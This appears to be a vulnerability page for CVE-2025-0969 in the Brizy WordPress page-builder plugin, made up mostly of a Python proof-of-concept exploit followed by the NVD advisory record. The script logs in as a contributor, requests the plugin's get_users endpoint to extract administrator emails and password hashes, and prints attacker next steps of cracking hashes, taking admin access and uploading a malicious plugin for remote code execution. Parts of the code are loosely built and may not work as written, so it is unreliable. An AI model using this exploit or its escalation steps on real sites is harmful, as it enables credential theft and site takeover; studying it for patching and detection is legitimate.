CVE-2025-0969

# CVE-2025-0969 PoC - Brizy Plugin Sensitive Information Exposure # Author: Security Researcher # Target: WordPress with Brizy Plugin <= 2.7.16 import requests import json import sys from urllib.parse import urljoin def exploit_brizy_cve_2025_0969(target_url, username, password): """ Exploit for CVE-2025-0969: Brizy Page Builder Plugin Information Disclosure Requires Contributor+ level access to extract admin email and password hashes """ session = requests.Session() # Step 1: Login to WordPress with contributor account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Attempting login to {login_url}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'authenticated' not in str(session.cookies): print('[-] Login failed. Check credentials.') return None print('[+] Login successful with contributor account') # Step 2: Exploit the vulnerable get_users() function via Brizy API # Target the vulnerable endpoint in editor/api.php exploit_url = urljoin(target_url, '/wp-content/plugins/brizy/editor/api.php') # Construct the vulnerable API request # The vulnerability is in get_users() function called via this endpoint params = { 'brizy_api': 'get_users', # Vulnerable function call 'hash': '', # May need valid hash depending on plugin config '_ajax_nonce': '' # May need nonce for some configurations } headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json' } print(f'[*] Exploiting vulnerable endpoint: {exploit_url}') try: # Try different attack vectors attack_vectors = [ {'action': 'brizy_get_users', 'method': 'GET'}, {'action': 'brizy_get_users', 'method': 'POST'}, {'endpoint': exploit_url, 'params': params, 'method': 'GET'} ] for vector in attack_vectors: if vector['method'] == 'GET': response = session.get(exploit_url, params=params, headers=headers) else: response = session.post(exploit_url, data=params, headers=headers) # Check for successful data exfiltration if response.status_code == 200: try: data = response.json() if 'users' in data or 'data' in data or 'email' in str(data).lower(): print('[+] Potential sensitive data found!') print(f'[+] Response: {json.dumps(data, indent=2)}') return data except: if 'user_email' in response.text or 'wp_users' in response.text: print('[+] Sensitive data found in response!') print(f'[+] Response preview: {response.text[:500]}') return response.text print('[-] No vulnerable response detected. Target may be patched or not vulnerable.') return None except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return None def main(): if len(sys.argv) < 4: print('Usage: python cve_2025_0969_poc.py <target_url> <username> <password>') print('Example: python cve_2025_0969_poc.py http://example.com contributor password123') sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print('=' * 60) print('CVE-2025-0969 - Brizy Page Builder Information Disclosure') print('=' * 60) result = exploit_brizy_cve_2025_0969(target_url, username, password) if result: print('\n[!] Exploitation successful!') print('[!] Extracted sensitive information includes:') print(' - Admin email addresses') print(' - Password hashes (can be cracked offline)') print('\n[!] Next steps for attacker:') print(' 1. Crack password hashes using tools like hashcat') print(' 2. Use cracked credentials to gain admin access') print(' 3. Upload malicious plugin for RCE') else: print('\n[-] Exploitation failed or target is not vulnerable') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-0969", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:44.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Brizy – Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.16 via the get_users() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including email addresses and hashed passwords of administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/api.php#L961", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3392844", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/brizy/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5987ef13-15d6-4ecf-894c-f22c8726402b?source=cve", "source": "[email protected]"}]}}